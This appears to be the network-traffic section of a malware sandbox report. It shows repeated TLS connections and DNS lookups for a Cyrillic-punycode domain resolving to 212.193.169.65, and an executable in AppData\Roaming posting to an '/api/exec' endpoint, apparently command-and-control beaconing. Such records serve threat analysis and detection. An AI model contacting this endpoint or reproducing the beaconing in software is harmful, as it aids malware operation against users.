                                                                                                                                          Nov 19, 2024 18:57:36.356324911 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356331110 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356340885 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356358051 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356391907 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356446028 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.673823118 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.673878908 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.673959017 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.674426079 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.674442053 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.472208023 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.472286940 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.474080086 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.474097967 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.474386930 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.475370884 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.475513935 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.475544930 CET44350067212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.475609064 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.607836962 CET50067443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.616436958 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.616487980 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:37.616729975 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.617480993 CET50070443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:37.617495060 CET44350070212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:46.972573996 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:46.972667933 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:46.973488092 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:46.973504066 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.784142017 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.784589052 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.785963058 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.785970926 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.786204100 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.786950111 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.787750959 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.787755966 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.788146019 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.788252115 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.788283110 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.788311958 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.788311958 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.788321018 CET44350100212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.788347006 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.788434029 CET50100443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.846659899 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.846709967 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:47.846797943 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.847198963 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:47.847208023 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.555229902 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.555290937 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.556680918 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.556700945 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.556952000 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.557528019 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.558533907 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.558558941 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.558681011 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.558711052 CET44350103212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.558811903 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.558811903 CET50103443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.736284971 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.736339092 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:48.736444950 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.736989021 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:48.737001896 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.536418915 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.536499023 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.538240910 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.538258076 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.538518906 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.539427042 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.540091991 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.540132999 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.540196896 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.540302992 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.540338039 CET44350106212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.540409088 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.540450096 CET50106443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.597450972 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.597498894 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:49.597567081 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.598690033 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:49.598701000 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.424487114 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.424557924 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.427752018 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.427757978 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.427999973 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.428900003 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.429270983 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.429291010 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.429389954 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.429414988 CET44350109212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.429466009 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.429523945 CET50109443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.479661942 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.479691029 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:50.479846954 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.480561972 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:50.480570078 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.299993992 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.301552057 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.301552057 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.301568031 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.302094936 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.303389072 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.303389072 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.303472996 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.303729057 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.303766966 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.303785086 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.303785086 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.303792953 CET44350112212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.303829908 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.304071903 CET50112443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.438536882 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.438607931 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:52.438723087 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.439131975 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:52.439150095 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.233958006 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.234101057 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.235547066 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.235558033 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.235802889 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.236665010 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.236783981 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.236800909 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.236906052 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.236933947 CET44350115212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.237040997 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.237262011 CET50115443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.346344948 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.346390963 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:53.346486092 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.346997976 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:53.347017050 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.183163881 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.183300018 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.187350988 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.187366962 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.187740088 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.229953051 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.246956110 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.248193979 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.248231888 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.248399019 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.248435974 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.248466015 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.248482943 CET44350118212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.248513937 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.248513937 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.248579025 CET50118443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.261557102 CET50121443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.261611938 CET44350121212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:54.261679888 CET50121443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.262293100 CET50121443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:54.262306929 CET44350121212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370781898 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370893002 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370918989 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370970011 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380078077 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380142927 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.380319118 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380732059 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380745888 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.173754930 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.173913002 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.176992893 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.177004099 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.177236080 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.178006887 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.178832054 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.178836107 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180490971 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180607080 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180633068 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180649996 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180658102 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180686951 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180706024 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180744886 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.213300943 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.213345051 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.213541985 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.215620995 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.215647936 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.047981977 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.048135996 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.073381901 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.073415041 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.073679924 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.075750113 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.078994036 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.079021931 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.079130888 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.079138994 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.079169989 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.079250097 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.079250097 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.494982004 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.495032072 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.495289087 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.495635033 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.495657921 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.215379000 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.215570927 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.217078924 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.217101097 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.217365980 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.218247890 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.218405008 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.218414068 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.219333887 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.219373941 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.219465017 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.219492912 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.219537973 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.219562054 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.275336981 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.275377989 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.275563002 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.276770115 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.276784897 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.097312927 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.097390890 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.098967075 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.098974943 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.099230051 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.099999905 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.100760937 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.100794077 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.100866079 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.100918055 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.100946903 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.101030111 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.101046085 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170046091 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170093060 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.170212030 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170814037 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170833111 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.895153046 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.895231009 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.240673065 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.240705013 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.241091013 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.241678953 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250463009 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250498056 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.250649929 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.250665903 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250689983 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.250744104 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250744104 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326118946 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326159000 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.326242924 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326888084 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326903105 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.118185043 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.118344069 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:14.119647026 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:14.119663954 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.119900942 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.120521069 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:14.167323112 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.490720987 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.490801096 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.491159916 CET50166443192.168.2.5212.193.169.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 18:57:08.096637964 CET | 62505 | 53 | 192.168.2.5 | 1.1.1.1
Nov 19, 2024 18:57:08.385417938 CET | 53 | 62505 | 1.1.1.1 | 192.168.2.5
Nov 19, 2024 18:58:14.491585970 CET | 53975 | 53 | 192.168.2.5 | 1.1.1.1
Nov 19, 2024 18:58:14.544210911 CET | 53 | 53975 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 19, 2024 18:57:08.096637964 CET | 192.168.2.5 | 1.1.1.1 | 0xc1e0 | Standard query (0) | id.xn--80akicokc0aablc.xn--p1ai | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:58:14.491585970 CET | 192.168.2.5 | 1.1.1.1 | 0xec22 | Standard query (0) | id.xn--80akicokc0aablc.xn--p1ai | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 18:57:08.385417938 CET | 1.1.1.1 | 192.168.2.5 | 0xc1e0 | No error (0) | id.xn--80akicokc0aablc.xn--p1ai | | 212.193.169.65 | A (IP address) | IN (0x0001) | false
Nov 19, 2024 18:58:14.544210911 CET | 1.1.1.1 | 192.168.2.5 | 0xec22 | No error (0) | id.xn--80akicokc0aablc.xn--p1ai | | 212.193.169.65 | A (IP address) | IN (0x0001) | false

                                                                                                                                          • id.xn--80akicokc0aablc.xn--p1ai:443
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49977 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:09 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
